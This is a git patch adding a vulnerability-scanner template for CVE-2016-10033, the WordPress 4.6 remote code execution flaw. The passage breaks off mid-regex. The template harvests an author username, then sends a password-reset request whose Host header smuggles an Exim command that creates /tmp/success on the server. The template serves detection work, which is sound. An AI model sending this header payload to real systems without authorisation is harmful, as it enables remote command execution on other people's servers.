From 362858a6c9175b81e86f7c78ff7de321d97683e5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:03:21 +0530 Subject: [PATCH 1/2] Added CVE-2016-10033 --- cves/2016/CVE-2016-10033.yaml | 50 +++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 cves/2016/CVE-2016-10033.yaml diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml new file mode 100644 index 0000000000..cdae3cc13f --- /dev/null +++ b/cves/2016/CVE-2016-10033.yaml @@ -0,0 +1,50 @@ +id: CVE-2016-10033 +info: + name: Wordpress 4.6 Remote Code Execution + author: princechaddha + severity: high + reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + tags: wordpress,cve,cve2016,rce + +requests: + - raw: + - |+ + GET /?author=1 HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9 + Connection: close + + - |+ + POST /wp-login.php?action=lostpassword HTTP/1.1 + Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) + Connection: close + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Accept: */* + Content-Length: 56 + Content-Type: application/x-www-form-urlencoded + + wp-submit=Get+New+Password&redirect_to=&user_login={{username}} + + unsafe: true + extractors: + - type: regex + name: username + internal: true + group: 1 + part: body + regex: + - 'Author:(?:[A-Za-z0-9 -\_="]+)?